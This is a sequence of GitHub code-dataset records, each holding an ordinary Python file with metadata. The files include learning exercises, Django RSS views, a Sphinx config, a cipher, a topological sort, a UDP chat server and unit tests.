sentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\n    # Don't change code above 👆\n\n    # Write your code below:\n    words = sentence.split(\" \")\n    result = {word:len(word) for word in words}\n\n    print(result)\n\n\ndef temperatureConversion():\n    weather_c = {\n        \"Monday\": 12,\n        \"Tuesday\": 14,\n        \"Wednesday\": 15,\n        \"Thursday\": 14,\n        \"Friday\": 21,\n        \"Saturday\": 22,\n        \"Sunday\": 24,\n    }\n    # 🚨 Don't change code above 👆\n\n\n    # Write your code 👇 below:\n\n    def fahrenheit(temp):\n        return (temp * 9/5) + 32\n\n    weather_f = {day:fahrenheit(value) for (day, value) in weather_c.items()}\n    print(weather_f)\n\n\n# iteration through pandas dataframe\n\nimport pandas as pd\n\ndic = {\n    \"student\":[\"Ajay\",\"Amal\",\"Praveen\"],\n    \"score\":[50,70,90]\n}\n\nstudent_data = pd.DataFrame(dic)\n\n# built-in loop from the pandas package\nfor (index, row) in student_data.iterrows():\n    
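# each row is a pandas Series indexed by the column names ('student', 'score')\n    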
print(row)","repo_name":"ajay007e/100-Days-Of-Code---Python","sub_path":"day 026/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42295727326","text":"from django.http import HttpResponseRedirect, Http404 \nfrom django.shortcuts import render_to_response, get_object_or_404, redirect\nfrom django.template import RequestContext\nfrom django.views.generic import list_detail\n\nfrom misc.json_encode import JSONResponse \nfrom .forms import AddFeed, EditSettings\nfrom .models import Feed, FeedItem, FavoriteItem\nfrom .utils import user_filter\n\ndef item_list(request, filter_type, template_name='rss/feeditem_list.html'):\n if filter_type == 'all':\n feed_item_list = FeedItem.objects.all()\n else:\n feed_item_list = user_filter(FeedItem.objects.all())\n feed_item_list = feed_item_list.order_by('-updated_datetime')\n return render_to_response(template_name, {'feed_item_list': feed_item_list}, context_instance=RequestContext(request))\n\ndef mark_favorite(request, object_id):\n \"\"\"\n Mark new item as favorite\n \"\"\"\n feed_item = get_object_or_404(FeedItem, id=object_id)\n fav_item, is_new = FavoriteItem.objects.get_or_create(feed_item=feed_item)\n if request.is_ajax():\n return JSONResponse({'status': 'ok', 'text': 'Marked as favorite'}, False)\n return redirect(request.META.get('HTTP_REFERER', 'feed_item_list'))\n\ndef unmark_favorite(request, object_id):\n \"\"\"\n Unmark new item favorite status\n \"\"\"\n fav_item = get_object_or_404(FavoriteItem, feed_item__id=object_id)\n fav_item.delete()\n if request.is_ajax():\n return JSONResponse({'status': 'ok', 'text': 'Unmarked favorite'}, False)\n return redirect(request.META.get('HTTP_REFERER', 'feed_item_list'))\n\ndef edit_settings(request, form_class=EditSettings, template_name='rss/edit_settings'):\n \"\"\"\n Select email for notification and keywords for filtering feed items\n \"\"\"\n if request.method == 'POST':\n form = form_class(request.POST)\n if form.is_valid():\n form.save()\n return redirect('feed_item_list')\n else:\n form = form_class()\n\n if request.is_ajax():\n template_name += '_ajax'\n template_name += '.html'\n return render_to_response(template_name, {'form': form}, context_instance=RequestContext(request))\n\ndef feed_add(request, form_class=AddFeed, template_name='rss/feed_add'):\n if request.method == 'POST':\n form = form_class(request.POST)\n if form.is_valid():\n form.save()\n return redirect('feed_list')\n else:\n form = form_class()\n\n if request.is_ajax():\n template_name += '_ajax'\n template_name += '.html'\n return render_to_response(template_name, {'form': form}, context_instance=RequestContext(request))\n\ndef feed_delete(request, object_id):\n feed = get_object_or_404(Feed, id=object_id)\n feed.delete()\n return redirect(request.META.get('HTTP_REFERER', 'feed_list'))\n","repo_name":"frol/rss-filter","sub_path":"apps/rss/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"71025173032","text":"import os\nimport sys\nimport sphinx_rtd_theme\nsys.path.insert(0, os.path.abspath('../..'))\ntry:\n import IPython\n print(\"ipython: %s, %s\" % (IPython.__version__, IPython.__file__))\nexcept ImportError:\n print(\"no ipython\")\n\n# -- Project information -----------------------------------------------------\n\nproject = 'famafrench'\ncopyright = 
'2020, Christian Jauregui'\nauthor = 'Christian Jauregui'\n\n# The full version, including alpha/beta/rc tags\nversion = '0.1.4'\nrelease = version\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = ['sphinx.ext.autodoc',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.autosectionlabel',\n 'sphinx.ext.doctest',\n 'sphinx.ext.extlinks',\n 'sphinx.ext.githubpages',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.napoleon',\n 'sphinx.ext.todo',\n 'sphinx.ext.viewcode',\n 'numpydoc',\n 'IPython.sphinxext.ipython_directive',\n 'IPython.sphinxext.ipython_console_highlighting',\n ]\n# Example NumPy Style Python Docstrings:\n# https://www.sphinx-doc.org/en/master/usage/extensions/example_numpy.html#example-numpy\n\n\n# TODO settings\ntodo_include_todos = True\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = []\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = [\".rst\", \".md\"]\nsource_suffix = '.rst'\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\nhtml_theme = 'sphinx_rtd_theme'\nhtml_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n\n# Add any paths that contain custom static files (such as style sheets) here, relative to this directory.\n# They are copied after the builtin static files, so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = []\n\n# -- Options for intersphinx extension ---------------------------------------\n# Example configuration for intersphinx: refer to the Python standard library.\nintersphinx_mapping = {\n \"statsmodels\": (\"http://www.statsmodels.org/dev/\", None),\n \"matplotlib\": (\"https://matplotlib.org\", None),\n \"scipy\": (\"https://docs.scipy.org/doc/scipy/reference/\", None),\n \"python\": (\"https://docs.python.org/3/\", None),\n \"numpy\": (\"https://numpy.org/devdocs/\", None),\n \"np\": (\"https://numpy.org/devdocs/\", None),\n \"pandas\": (\"https://pandas.pydata.org/pandas-docs/stable/\", None),\n \"pd\": (\"https://pandas.pydata.org/pandas-docs/stable/\", None),\n \"pandas-datareader\": (\"https://pydata.github.io/pandas-datareader/devel/\", None),\n}\n\n# -- Options for napolean settings extension ---------------------------------------\nnapoleon_numpy_docstring = True\nnapoleon_include_private_with_doc = True\nnapoleon_use_admonition_for_examples = False\nnapoleon_use_admonition_for_notes = False\nnapoleon_use_admonition_for_references = False\n\n\n# -- Options for numpydoc settings extension ---------------------------------------\nnumpydoc_use_autodoc_signature = True\nnumpydoc_xref_param_type = True\nnumpydoc_class_members_toctree = False\nnumpydoc_xref_aliases = {\n \"Figure\": \"matplotlib.figure.Figure\",\n \"Axes\": \"matplotlib.axes.Axes\",\n \"AxesSubplot\": 
\"matplotlib.axes.Axes\",\n \"DataFrame\": \"pandas.DataFrame\",\n \"Series\": \"pandas.Series\",\n}\n# Whether to show all members of a class in the Methods and Attributes sections automatically. True by default.\n# Also see: https://stackoverflow.com/questions/35438697/section-ignored-by-sphinx-using-numpy-style-formatting\nnumpydoc_show_class_members = False\n\n\n# -- Options for autosummary settings extension ---------------------------------------\nautosummary_generate = True\nautosummary_generate_overwrite = False\n\n\n# -- Options for autoclass settings extension ---------------------------------------\nautoclass_content = \"class\"\n\n\n# -- Options for autosectionalabel settings extension ---------------------------------------\nautosectionlabel_prefix_document = True","repo_name":"christianjauregui/famafrench","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"} +{"seq_id":"23729896174","text":"TEST_INPUT_FILE='input/input_2019_06_test.txt'\nINPUT_FILE='input/input_2019_06.txt'\n\norbits = {}\nwith open(INPUT_FILE) as f:\n\tfor line in f.readlines():\n\t\tvalues = line.rstrip().split(')')\n\t\torbits[values[1]]=values[0]\n\t\ndef find_orbit_path(planet):\n\tif planet == 'COM': return []\n\tinner = orbits[planet]\n\tval = [inner] + find_orbit_path(inner)\n\treturn val\n\ntotal_orbits=0\nfor planet in orbits.keys():\n\torbs = find_orbit_path(planet)\n\tprint (planet, orbs)\n\ttotal_orbits += len(orbs)\nprint(total_orbits)\n\ndef find_orbit_delta(item1, item2):\n\tpath1 = set(find_orbit_path(item1))\n\tpath2 = set(find_orbit_path(item2))\n\n\tuni = path1.union(path2)\n\tinters = path1.intersection(path2)\n\treturn (len(uni)-len(inters))\n\nprint(find_orbit_delta('YOU', 'SAN'))\n\n","repo_name":"sdvinay/advent_of_code","sub_path":"2019_06.py","file_name":"2019_06.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39608629929","text":"from targetPage import Element, TargetPage, Driver\r\n\r\npage_names = [\"\", \"\"]\r\nURLs = ['https://www.', \r\n 'https://www.']\r\nclass_names_for_waiting_loading_page = ['', '']\r\nURL_tables = [[Element(\"//*[@id=\\\"\\\"]/div[3]/div[3]/table\", \"XPATH\"), 2, \r\n [Element(\"\", \"CLASS_NAME\"), [-1, \"기업명\"], [-1, \"홈페이지\"]]],\r\n [Element(\"//*[@id=\\\"\\\"]/div[1]/table\", \"XPATH\"), -1, \r\n [Element(\"\", \"CLASS_NAME\"), [0, \"법인명\"], [1, \"홈페이지\"]]]]\r\nPagings = [Element(\"//*[@id=\\\"\\\"]/div[3]/div[4]\", \"XPATH\"),\r\n Element(\"//*[@id=\\\"\\\"]/div[2]\", \"XPATH\")]\r\nstart_page = [1, 11]\r\n\r\ntarget_pages = []\r\ndriver = Driver('../chromedriver.exe')\r\nfor i in range(len(URLs)-1, -1, -1):\r\n class_name_for_waiting_loading_page = class_names_for_waiting_loading_page[i]\r\n target_page = TargetPage(page_names[i], driver, URLs[i], Element(class_name_for_waiting_loading_page, \"CLASS_NAME\"), \r\n URL_tables[i], Pagings[i], start_page[i])\r\n target_pages.append(target_page)\r\n\r\nfor target_page in target_pages:\r\n target_page.OpenPage()\r\n # 이후 ref-1을 참고해서 웹 페이지가 잘 열렸는지 확인하고 다음 step 진행하기\r\n if not target_page.CheckPageLoadingDone():\r\n print(target_page.name, \"페이지 명시적 대기 실패\")\r\n else:\r\n # 홈페이지가 있는 기업들 및 해당 url들을 추출한다\r\n target_page.ExportURLs()\r\n 
","repo_name":"syoh1113/web-crawler-with-selenium","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45030811814","text":"from io import StringIO\nfrom django.core.management import call_command, CommandError\nfrom django.test import TestCase\nfrom galaxy_ng.app.models.auth import Group\n\n\nclass TestAssignPermissionCommand(TestCase):\n def setUp(self):\n super().setUp()\n group = Group.objects.create(name='administrator')\n group.save()\n\n def test_command_output(self):\n with self.assertRaisesMessage(\n CommandError,\n 'Error: the following arguments are required: group, permissions'\n ):\n call_command('assign-permission')\n\n def test_add_permission(self):\n out = StringIO()\n call_command(\n 'assign-permission', 'administrator', 'galaxy.add_namespace',\n stdout=out)\n self.assertIn(\n \"Assigned requested permission to group 'administrator'\",\n out.getvalue())\n admin_group = Group.objects.get(name='administrator')\n self.assertIn(\n 'add_namespace',\n [perm.codename for perm in admin_group.permissions.all()]\n )\n\n def test_add_multiple_permissions(self):\n out = StringIO()\n call_command('assign-permission', 'administrator',\n 'galaxy.add_namespace', 'galaxy.change_namespace', stdout=out)\n self.assertIn(\"Assigned requested permission to group 'administrator'\", out.getvalue())\n admin_group = Group.objects.get(name='administrator')\n self.assertIn(\n 'add_namespace',\n [perm.codename for perm in admin_group.permissions.all()]\n )\n\n def test_group_not_found(self):\n with self.assertRaisesMessage(\n CommandError,\n 'Group system:foo does not exist. Please provide a valid group '\n 'name'\n ):\n call_command('assign-permission', 'system:foo',\n 'galaxy.add_namespace')\n\n def test_permission_not_found(self):\n out = StringIO()\n with self.assertRaisesMessage(\n CommandError,\n \"Permission galaxy.foo not found. Please provide a valid \"\n \"permission in the form 'app_label.codename'\"\n ):\n call_command('assign-permission', 'administrator', 'galaxy.foo',\n stdout=out)\n\n def test_permission_format(self):\n out = StringIO()\n with self.assertRaisesMessage(\n CommandError,\n \"Invalid permission format for foo. Expecting \"\n \"'app_label.codename'\"\n ):\n call_command('assign-permission', 'administrator', 'foo',\n stdout=out)\n","repo_name":"ansible/galaxy_ng","sub_path":"galaxy_ng/tests/unit/app/management/commands/test_assign_permission.py","file_name":"test_assign_permission.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"72"} +{"seq_id":"32110429592","text":"# programme to input student details and view them\n\n# helen o'shea\n# 20210218\n\n# function to show the menu\ndef show_menu():\n print(\"What would you like to do? 
\\n\\\n \\t(a) Add new student\\n\\\n \\t(v) View students\\n\\\n \\t(q) Quit\")\n option = input(\"Type one letter (a/v/q): \").strip() # takes input from user \n return option\n\n# function to add student first name last name and modules\ndef do_add(students):\n myStudent = {} # initialise the dict\n myStudent['firstname'] = input(\"Enter your first name: \").strip()\n myStudent['lastname'] = input(\"Enter your last name: \").strip()\n myStudent['modules'] = read_modules() # modules are entered via another function and called here\n students.append(myStudent) # add dict entries to the student list\n \n\n# function to add courses and grades\ndef read_modules():\n modules = []\n course = input(\"Enter the Module name:\" ).strip() # get entry for module name\n while course !=\"\": # do while course is entered i.e. it will stop if no info added\n module={}\n module['course'] = course\n module['grade'] = float(input(\"Enter the grade: \").strip()) # get entry for grade (as a float)\n modules.append(module) # \n course = input(\"Enter the Module name:\" ).strip() # ask for more input - if this is blank the function will return \n return modules \n\n\ndef view_modules(modules):\n print(\"Course Name\" \"\\tGrade\")\n for module in modules:\n print(\"{} \\t{}\".format(module['course'], module['grade']))\n\n# function to view the entries\ndef do_view(students):\n print(\"\\n\") # leave a gap between this function call and the show_menu function\n if len(students)<1: # if this is true then there are no entries to show\n print(\"your student list is empty\")\n for student in students:\n print(student['firstname'], \" \", student['lastname'])\n view_modules(student['modules'])\n\n\n\n# this function is the main function that calls the other functions\ndef main():\n students = [] # initialise student list\n option = show_menu() # show the menu \n while(option != 'q'): # while q has not been selected function will exit if q selected\n if option == 'a': # show option a\n do_add(students) # option a calls the function to add students\n elif option == 'v': # show option v\n do_view(students) # option v calls the function to show students\n elif option !='q': # catch for an invalid entry\n print(\"\\n\\nplease select either a,v or q\")\n option=show_menu() # show the menu again for more choices if q is not selected\n\n# this calls the main function\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Osheah/hospfcs2021","sub_path":"semester1/week05/studentsRedo.py","file_name":"studentsRedo.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39300320956","text":"#!/usr/bin/env python3\nimport argparse\nimport sys\n\nfrom uccaapp.api import ServerAccessor\n\ndesc = \"\"\"Convert a passage file to JSON format and upload to UCCA-App as a completed task\"\"\"\n\n\nclass AnnotationTaskCreator(ServerAccessor):\n def __init__(self, user_id, **kwargs):\n super().__init__(**kwargs)\n self.set_user(user_id)\n\n def create_task(self, filename, **kwargs):\n del kwargs\n with open(filename) as f:\n num = 0\n for line in f:\n fields = line.strip().split()\n if len(fields) != 2:\n sys.stderr.write(\"Error in line: \"+line.strip())\n continue\n user_id = fields[0]\n user_model = self.get_user(user_id)\n tok_task_out = self.get_task(fields[1])\n task_in = dict(type=\"ANNOTATION\", status=\"SUBMITTED\",\n project=self.project, user=user_model,\n passage=tok_task_out[\"passage\"], manager_comment=\"Reviews corpus\",\n 
user_comment=\"Test\", parent=tok_task_out,\n is_demo=False, is_active=True)\n self.create_annotation_task(**task_in)\n num += 1\n print(\"Uploaded %d tasks successfully.\" % num, file=sys.stderr)\n\n @staticmethod\n def add_arguments(argparser):\n argparser.add_argument(\"filename\", help=\"a file where each line is a \")\n ServerAccessor.add_user_id_argument(argparser)\n ServerAccessor.add_arguments(argparser)\n\n\ndef main(**kwargs):\n AnnotationTaskCreator(**kwargs).create_task(**kwargs)\n\n\nif __name__ == \"__main__\":\n argument_parser = argparse.ArgumentParser(description=desc)\n AnnotationTaskCreator.add_arguments(argument_parser)\n main(**vars(argument_parser.parse_args()))\n sys.exit(0)\n","repo_name":"shachardon/ucca","sub_path":"uccaapp/create_annotation_tasks.py","file_name":"create_annotation_tasks.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"32769245566","text":"#!/usr/bin/python\n\n'''\nA function that implements a substitution cipher.\nthe function takea two parameters, the message you want to encrypt, \nand a string that represents the mapping of the 26 letters in the alphabet. \n'''\n\nimport string\n\ndef cipher(message, str_mapping):\n upperCase_mapping = str_mapping.upper()\n encrypt = []\n for c in message:\n if c in string.ascii_uppercase:\n sub = str_mapping.upper()[string.ascii_uppercase.index(c)]\n encrypt.append(sub)\n elif c in string.ascii_lowercase:\n sub = str_mapping[string.ascii_lowercase.index(c)]\n encrypt.append(sub)\n else:\n encrypt.append(c)\n result = \"\".join(encrypt)\n return result\n \n \n \n \nr = cipher(\"Write a function that implements a substitution cipher.\",\"efghijklmnopqrstuvwxyzabcd\")\nprint(r) ","repo_name":"gkl1107/Python-algorithm","sub_path":"alphabet_cipher.py","file_name":"alphabet_cipher.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12037797542","text":"\"\"\"\nThis class contains algorithms for topologically sorting graphs.\n\"\"\"\n\nfrom transiter.services.servicemap.graphutils import (\n datastructures,\n operations,\n traversals,\n)\n\n\nclass ImpossibleToTopologicallySortGraph(Exception):\n \"\"\"\n Exception thrown if the inputted directed graph contains a cycle.\n \"\"\"\n\n\ndef basic_sort(graph: datastructures.AbstractGraph) -> datastructures.OrderedGraph:\n \"\"\"\n Topologically sort a directed graph.\n\n The algorithm here is the basic topological sort algorithm, except the\n sorting has the following property. 
If there are vertices A, B, C, such\n (A,B) and (B,C) are edges, and there are no other edges out of A and B\n and in to B and C, then A, B and C will be consecutive in the sorting.\n\n Raises ImpossibleToTopologicallySortGraph: if the graph cannot be sorted;\n i.e., it contains a cycle.\n \"\"\"\n sorted_nodes = []\n admissible_next_nodes = datastructures.Stack(graph.sources())\n node_to_in_node_count = {node: len(node.in_nodes) for node in graph.nodes()}\n\n while len(admissible_next_nodes) > 0:\n node = admissible_next_nodes.pop()\n sorted_nodes.append(node)\n for candidate_next_node in node.out_nodes:\n node_to_in_node_count[candidate_next_node] -= 1\n if node_to_in_node_count[candidate_next_node] == 0:\n admissible_next_nodes.push(candidate_next_node)\n\n if len(graph) != len(sorted_nodes):\n raise ImpossibleToTopologicallySortGraph\n\n return datastructures.OrderedGraph(graph, sorted_nodes)\n\n\ndef optimal_sort_for_trees(graph: datastructures.Tree) -> datastructures.OrderedTree:\n graph_reversed = False\n if graph.is_in_tree():\n graph.reverse()\n graph_reversed = True\n node_to_descendents_count = {}\n for node in traversals.post_order_dfs_traversal(graph.root):\n node_to_descendents_count[node] = 1 + sum(\n node_to_descendents_count[child_node] for child_node in node.out_nodes\n )\n ordered_graph = datastructures.OrderedTree(\n graph,\n traversals.pre_order_dfs_traversal(\n graph.root, sorting_key=node_to_descendents_count.get\n ),\n )\n if graph_reversed:\n ordered_graph.reverse()\n return ordered_graph\n\n\ndef tgt_sort(graph: datastructures.AbstractGraph) -> datastructures.OrderedGraph:\n tree_1, inner_graph, tree_2 = operations.calculate_tgt_decomposition(\n operations.calculate_transitive_reduction(graph.immutable())\n )\n\n labels = []\n for sub_graph, sorting_method in (\n (tree_1, optimal_sort_for_trees),\n (inner_graph, basic_sort),\n (tree_2, optimal_sort_for_trees),\n ):\n if sub_graph is None:\n continue\n new_labels = [node.label for node in sorting_method(sub_graph).nodes()]\n if len(labels) > 0:\n assert labels[-1] == new_labels[0]\n labels += new_labels[1:]\n else:\n labels = new_labels\n return datastructures.OrderedGraph(\n graph, [graph.get_node(label) for label in labels]\n )\n","repo_name":"jamespfennell/transiter-python","sub_path":"transiter/services/servicemap/graphutils/topologicalsort.py","file_name":"topologicalsort.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22911799838","text":"#Loop checking for positive number\npos_num = -1\nwhile pos_num <= 0:\n pos_num = float(input('Please type a positive number: '))\n if pos_num <= 0:\n print('Sorry but that is not a positibe number please try again!')\nprint(f'The number is: {pos_num}')\n\n#Ask for candy until yes...\ncandy_yes = 'no'\nwhile candy_yes.lower() != 'yes':\n candy_yes = input('Can I have a piece of candy? 
')\nprint('Thank you!!!!')\n","repo_name":"Jammonjones/CSE-110","sub_path":"Week 4/firstlooppractice.py","file_name":"firstlooppractice.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20373806451","text":"\"\"\"\n Chat room\n env:python3.6\n socket fork\n 聊天室服务端程序\n\"\"\"\n\nimport os\nimport sys\nfrom socket import *\nfrom time import sleep\n\n# 服务器地址\nADDR = ('176.215.155.118', 2810)\n# 用户信息\nuser = {}\n\n\ndef main():\n \"\"\"\n 创建网络连接\n :return:\n \"\"\"\n # 套接字\n s = socket(AF_INET, SOCK_DGRAM)\n s.bind(ADDR)\n\n pid = os.fork()\n if pid < 0:\n return\n # 发送管理员消息\n elif pid == 0:\n while True:\n text = input(\"管理员消息:\")\n msg = \"C 管理员消息 \" + text\n s.sendto(msg.encode(), ADDR)\n if text == \"10秒后服务器关闭.\":\n for i in range(9):\n sleep(1)\n s.sendto(f\"C 管理员消息 {9-i}秒后服务器关闭.\".encode(), ADDR)\n for item in user:\n s.sendto(b\"EXIT\", user[item])\n sleep(1)\n sys.exit(\"服务器关闭.\")\n else:\n do_request(s)\n\n\ndef do_request(s):\n \"\"\"\n 接收各种客户端的请求\n :param s: 套接字\n :return:\n \"\"\"\n while True:\n data, addr = s.recvfrom(1024)\n msg = data.decode().split()\n\n # 区分请求类型\n if msg[0] == \"L\":\n do_login(s, msg[1], addr)\n elif msg[0] == \"C\":\n text = ' '.join(msg[2:])\n do_chat(s, msg[1], text)\n elif msg[0] == \"Q\":\n do_quit(s, msg[1])\n\n\ndef do_login(s, name, addr):\n \"\"\"\n 处理进入聊天室请求\n :param s: 套接字\n :param name: 用户姓名\n :param addr: 用户地址\n :return:\n \"\"\"\n if name in user or \"管理员\" in name:\n s.sendto(\"该用户已存在\".encode(), addr)\n return\n\n s.sendto(b\"OK\", addr)\n\n # 通知其他人\n msg_welcom = \"欢迎%s进入聊天室\" % name\n for key in user:\n s.sendto(msg_welcom.encode(), user[key])\n\n # 将用户加入\n user[name] = addr\n\n\ndef do_chat(s, name, text):\n \"\"\"\n 聊天过程,\n 将用户发送信息发送给其他所有用户\n :param s: 套接字\n :param name: 用户姓名\n :param text: 用户发送信息\n :return:\n \"\"\"\n\n msg = \"%s : %s\" % (name, text)\n for item in user:\n if item != name:\n s.sendto(msg.encode(), user[item])\n\n\ndef do_quit(s, name):\n \"\"\"\n 退出聊天室\n :param s: 套接字\n :param name: 用户姓名\n :return:\n \"\"\"\n msg = \"%s退出聊天室\" % name\n for item in user:\n if item != name:\n s.sendto(msg.encode(), user[item])\n else:\n s.sendto(b\"EXIT\", user[item])\n del user[name]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cx2810/ChatRoom","sub_path":"chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29866299790","text":"import math\n\nimport numpy as np\nfrom collections import Counter\n\nif __name__ == '__main__':\n# 4.有两个数组,x=np.array([436,556,607,899]),y=np.array([556,559,607,936,966]),请使用合适的方法获取两个数组的公共项\n x=np.array([436,556,607,899])\n y=np.array([556,559,607,936,966])\n arr6=np.intersect1d(x,y)\n print(arr6)\n\n\n\n\n# 5.计算给定数组np.array([33,35,60,70,85])和np.array([44,51,65,73,80])之间的欧氏距离\n# arr7=np.array([33,35,60,70,85])\n# arr8=np.array([44,51,65,73,80])\n# res=np.sqrt(np.sum(np.square(arr8-arr7)))\n# print(res)\n\n\n# 6.输入数字n,创建数字从 1 到 n 的 1 维数组arr,将 arr 中的所有奇数替换成 -1\n# arr4=np.arange(1,21)\n# arr4[arr4%2!=0]=-1\n# print(arr4)\n\n# 7.给定数组[1, 2, 3, 4, 5],获取到平均值,将平均值插入到每个元素直接得到新的数组\n arr = np.array([1, 2, 3, 4, 5])\n arr6=np.insert(arr, np.arange(1, len(arr)), arr.mean())\n print(arr6)\n# 8.创建一个5*5的随机值数组,并找到最大值,并替换为0\n# arr5=np.random.randint(1,10,size=25).reshape(5,5)\n# print(arr5.max())\n# arr6=arr5[arr5==arr5.max()]=0\n# 
print(arr5)\n","repo_name":"2845666517/course_3","sub_path":"day1_numpy/exam2.py","file_name":"exam2.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32941865651","text":"import shutil, tempfile\nimport numpy as np\nfrom os import path\nfrom skimage import data\nimport skimage.io as skimgio\nimport imghdr\nfrom PIL import Image\nfrom img2d import Img2DColumn, Img2DSerDe, Img2DColumnMetadata, Img2DReader, ImgNormalizationTransform\nimport unittest\nimport random\n\ntest_csv_file = 'test.csv'\ntest_img_file = 'test-img.png'\n\n\ndef create_test_data():\n test_dir = tempfile.mkdtemp()\n # Create and save image\n image = data.camera()\n img = Image.fromarray(image)\n test_img_file_path = path.join(test_dir, test_img_file)\n img.save(test_img_file_path)\n\n return test_dir, test_img_file_path\n\n\nclass TestImg2DSerDe(unittest.TestCase):\n def setUp(self):\n self.test_dir, self.test_img_file_path = create_test_data()\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_img2d_ser_de_is_raw_img_true(self):\n img2d_col = Img2DColumn(columns_indexes=[0], pre_transforms=[], post_transforms=[], is_raw_img=True)\n reader = img2d_col.reader\n ser_de = img2d_col.ser_de\n img = reader.read([self.test_img_file_path])\n img_s = ser_de.serialize(img)\n img_d = ser_de.deserialize(img_s)\n self.assertTrue(np.array_equal(img[0], img_d))\n\n def test_img2d_ser_de_is_raw_img_false(self):\n img2d_col = Img2DColumn(columns_indexes=[0], pre_transforms=[], post_transforms=[], is_raw_img=False)\n reader = img2d_col.reader\n ser_de = img2d_col.ser_de\n img = reader.read([self.test_img_file_path])\n img_s = ser_de.serialize(img)\n img_d = ser_de.deserialize(img_s)\n self.assertTrue(np.array_equal(img[0], img_d))\n\n\nclass TestImg2DMetadata(unittest.TestCase):\n def setUp(self):\n self.test_dir, self.test_img_file_path = create_test_data()\n\n def tearDown(self):\n shutil.rmtree(self.test_dir)\n\n def test_img2d_column_metadata(self):\n img2d_col = Img2DColumn(columns_indexes=[0], pre_transforms=[], post_transforms=[])\n aggregated_metadata = []\n for i in range(0, 5):\n img, img_fmt = img2d_col.reader.read([self.test_img_file_path])\n metadata = Img2DColumnMetadata()\n metadata.aggregate(img=img)\n aggregated_metadata.append(metadata)\n img2d_col.metadata.merge(aggregated_metadata)\n mean_img = img2d_col.metadata.img\n original_img = img2d_col.reader.read([self.test_img_file_path])[0]\n # Should be equal because we are using the same image\n self.assertTrue(np.array_equal(mean_img, original_img))\n\n\n# class TestImg2DImgNormalizationTransform(unittest.TestCase):\n# def setUp(self):\n# self.test_dir, self.test_img_file_path = create_test_data()\n#\n# def tearDown(self):\n# shutil.rmtree(self.test_dir)\n#\n# def test_img2d_normalization(self):\n# img_data = skimgio.imread(self.test_img_file_path)\n# img_fmt = imghdr.what(self.test_img_file_path)\n# data = img_data, img_fmt\n# transform = ImgNormalizationTransform(True)\n# tr_data = transform.apply(data)\n# self.assertTrue(np.array_equal(data[0], tr_data[0]))\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"SummaLabs/DLS","sub_path":"app/backend/core/dataset/img2d_test.py","file_name":"img2d_test.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"36086322319","text":"# generating fake data\n\nimport pandas as pd\nimport numpy as 
